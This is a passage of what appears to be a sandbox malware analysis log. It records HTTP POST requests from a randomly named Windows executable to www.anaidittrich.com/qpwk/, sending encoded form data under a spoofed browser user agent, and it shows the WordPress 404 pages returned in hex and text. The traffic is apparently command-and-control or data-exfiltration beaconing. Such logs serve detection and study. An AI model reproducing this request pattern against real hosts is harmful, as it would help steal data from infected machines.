                                        Sep 3, 2024 13:55:46.366947889 CEST1236INData Raw: 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63
                                        Data Ascii: :100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}</style><s
                                        Sep 3, 2024 13:55:46.366960049 CEST1236INData Raw: 3d 36 2e 36 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 68 65 61 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 68 31 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2c
                                        Data Ascii: =6.6.1' media='all' /><style id='wp-block-heading-inline-css'>h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:wher
                                        Sep 3, 2024 13:55:46.366971970 CEST1236INData Raw: 29 3b 0a 09 09 09 09 09 63 6c 69 70 2d 70 61 74 68 3a 20 70 61 74 68 28 27 4d 31 31 2e 39 33 2e 36 38 34 76 38 2e 30 33 39 6c 35 2e 36 33 33 2d 35 2e 36 33 33 20 31 2e 32 31 36 20 31 2e 32 33 2d 35 2e 36 36 20 35 2e 36 36 68 38 2e 30 34 76 31 2e
                                        Data Ascii: );clip-path: path('M11.93.684v8.039l5.633-5.633 1.216 1.23-5.66 5.66h8.04v1.737H13.2l5.701 5.701-1.23 1.23-5.742-5.742V21h-1.737v-8.094l-5.77 5.77-1.23-1.217 5.743-5.742H.842V9.98h8.162l-5.701-5.7 1.23-1.231 5.66 5.66V.684h1.737Z');
                                        Sep 3, 2024 13:55:46.366983891 CEST1236INData Raw: 61 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e
                                        Data Ascii: ap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writi
                                        Sep 3, 2024 13:55:46.366998911 CEST1236INData Raw: 61 70 70 65 72 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 77 69 64 74 68 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65
                                        Data Ascii: apper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidd
                                        Sep 3, 2024 13:55:46.371840954 CEST1236INData Raw: 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 69 6e 73 69 64 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 29 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f
                                        Data Ascii: e(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-bloc


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.449771162.55.254.209806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:48.235692978 CEST775OUTPOST /qpwk/ HTTP/1.1
                                        Host: www.anaidittrich.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.anaidittrich.com
                                        Referer: http://www.anaidittrich.com/qpwk/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 71 52 4d 73 54 4d 61 76 6e 43 34 36 65 68 43 32 7a 2f 4e 33 34 4c 44 36 50 4b 54 5a 31 58 71 56 6b 3d
                                        Data Ascii: r8=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQlqRMsTMavnC46ehC2z/N34LD6PKTZ1XqVk=
                                        Sep 3, 2024 13:55:48.917521000 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:55:48 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                                        Upgrade: h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                                        Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                                        Sep 3, 2024 13:55:48.917538881 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                                        Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                                        Sep 3, 2024 13:55:48.917551041 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                                        Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                                        Sep 3, 2024 13:55:48.917598963 CEST1236INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                                        Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                                        Sep 3, 2024 13:55:48.917610884 CEST1236INData Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
                                        Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
                                        Sep 3, 2024 13:55:48.917622089 CEST1236INData Raw: 72 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 7d 2e 6c 69 6e 6b 2d 75 69 2d 62 6c 6f 63 6b 2d 69 6e 73 65 72 74 65 72 5f 5f 62 61 63 6b 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a
                                        Data Ascii: rter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}.is-style-arrow-link .wp-block-navigation-item__label:after {content: "\2197";padding-inline-start: 0.25rem;vertical-align: mid
                                        Sep 3, 2024 13:55:48.917634964 CEST776INData Raw: 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74
                                        Data Ascii: lign-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-
                                        Sep 3, 2024 13:55:48.917654037 CEST1236INData Raw: 6f 69 64 20 75 73 69 6e 67 20 65 6d 70 74 79 20 68 65 61 64 69 6e 67 73 20 74 6f 20 64 69 73 70 6c 61 79 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 6f 6e 6c 79 2c 20 77 68 69 63 68 20 69 73 20 61 6e 20 41 31 31 59 20 69 73 73 75 65 20 2a 2f 0a 09
                                        Data Ascii: oid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;}.is-style-asterisk:-moz-only-whitespace:before {content: none;}.is-style-ast
                                        Sep 3, 2024 13:55:48.917665958 CEST1236INData Raw: 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74
                                        Data Ascii: .wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:w
                                        Sep 3, 2024 13:55:48.917680025 CEST1236INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f
                                        Data Ascii: .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;ma
                                        Sep 3, 2024 13:55:48.922507048 CEST1236INData Raw: 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 6e 6f 72 6d 61 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f
                                        Data Ascii: d='wp-block-columns-inline-css'>.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.449772162.55.254.209806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:50.925137043 CEST10857OUTPOST /qpwk/ HTTP/1.1
                                        Host: www.anaidittrich.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.anaidittrich.com
                                        Referer: http://www.anaidittrich.com/qpwk/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 51 49 2b 48 6c 32 72 49 37 69 71 42 4f 4c 47 30 37 6a 63 4f 57 7a 51 52 45 63 6b 47 4a 36 62 41 38 35 78 77 67 68 65 76 65 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2b 36 71 72 53 6f 4a 79 51 4b 31 32 4c 74 49 49 6f 51 71 48 56 6f 42 70 53 79 58 63 2b 6f 50 52 66 71 44 34 30 39 6b 79 38 36 4c 4f 43 58 52 68 57 57 77 33 56 69 75 69 62 50 59 77 54 6b 36 4e 43 4e 30 30 73 49 48 5a 56 69 56 38 30 2b 34 31 5a 37 70 37 [TRUNCATED]
                                        Data Ascii: r8=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Soi5ofId+PVPng9ZUNqHdJlvp8k9So7qxzy1FCrSn1U/LnulxDI8+Kq17IdQG+CUk6vXqMCBkKuB0/MWNJ1OhqEGMvtlcFGfaovE0SMVSb1k73LkP72e63pIJlEamc86KrspxbYjK2QI+Hl2rI7iqBOLG07jcOWzQREckGJ6bA85xwgheveu7ery1WmkCYAEmhKY0Z2J/fmD2isuZ1Tb+6qrSoJyQK12LtIIoQqHVoBpSyXc+oPRfqD409ky86LOCXRhWWw3ViuibPYwTk6NCN00sIHZViV80+41Z7p7XDuuiKjgNWL44ASCG4MQL97TOp5YowKnTi2+vw+eZ3gbNRCYkogH66pJ+XUbTgwny+e6wuFU3lNG+VxikSkiP3izlcuPhaH92SvGVPpr5xxegSkx4xt2FohIBs4tpK/Anrk/Ph+cTKYEnwGu3sCQI1XPEs8qTFLF1H9UFrFUlOtxA+DbP4xeBrTWg+PVlm3uf/xuq4PGixaarVlg9OpqyFp91yI/FTbdS+4F8ChOGTs24O0nN9GWFPY3VG2SYh1/zjGkFBYZxTU7pltXV7ZXxTqED2Oj5OS9FRVZXnu+xVg2kVxIuiV6gbbM471OLC4vsQUmJ4b67cN1jxxWRbpKA3Lw3Kg14jmz1zQTz4sFvS29HrPEkgZs4tlPucelAqWspb8OEC2UkvpbjcbmzR9DldwW2ObLj6tBgZ28wiPLTOM6ivKQtcJ6ZLU15bPwBM/9oDTXJbsS8PJ4GXYO2NMLMow6MpokA+eBWw9Lz+PRO1L2CtyMD30sM/X9ffAjl6OiKuEOD03yTA1IbaiUcB2vFG3PMsJM4jjf2K3s2ZZNyx11XVAyHjpBC3HFvLsziwCZeE4+zx4orCli0pzck+7pSgiPnLLd2ep45fFyFDCx6t4YBBE1cLG3Sk1zJcTW7qPkkhWUza2Z9RNks7ORr/+D/aAKF8dODelk4P [TRUNCATED]
                                        Sep 3, 2024 13:55:51.697757959 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:55:51 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                                        Upgrade: h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                                        Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                                        Sep 3, 2024 13:55:51.697773933 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                                        Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                                        Sep 3, 2024 13:55:51.697783947 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                                        Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                                        Sep 3, 2024 13:55:51.697794914 CEST1236INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                                        Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                                        Sep 3, 2024 13:55:51.697808027 CEST896INData Raw: 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a
                                        Data Ascii: rything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><style id='wp-block-site-logo-inline-css'>.wp-block-site-lo
                                        Sep 3, 2024 13:55:51.697818995 CEST1236INData Raw: 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2d 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63
                                        Data Ascii: -block-group-is-layout-constrained){position:relative}</style><style id='wp-block-navigation-link-inline-css'>.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__des
                                        Sep 3, 2024 13:55:51.697829962 CEST1236INData Raw: 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77
                                        Data Ascii: ng-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=ver
                                        Sep 3, 2024 13:55:51.697839975 CEST1236INData Raw: 09 09 09 09 63 6f 6e 74 65 6e 74 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 3a 2d 6d 6f 7a 2d 6f 6e 6c 79 2d 77 68 69 74 65 73 70 61 63 65 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09
                                        Data Ascii: content: none;}.is-style-asterisk:-moz-only-whitespace:before {content: none;}.is-style-asterisk.has-text-align-center:before {margin: 0 auto;}.is-style-asterisk.has-text-align-right:before {
                                        Sep 3, 2024 13:55:51.697851896 CEST1236INData Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 20 73 76 67 7b 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 34 70 78 3b 77 69 64 74 68 3a 31 2e 32 35 65 6d 3b 66 69 6c 6c 3a 63
                                        Data Ascii: earch__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex
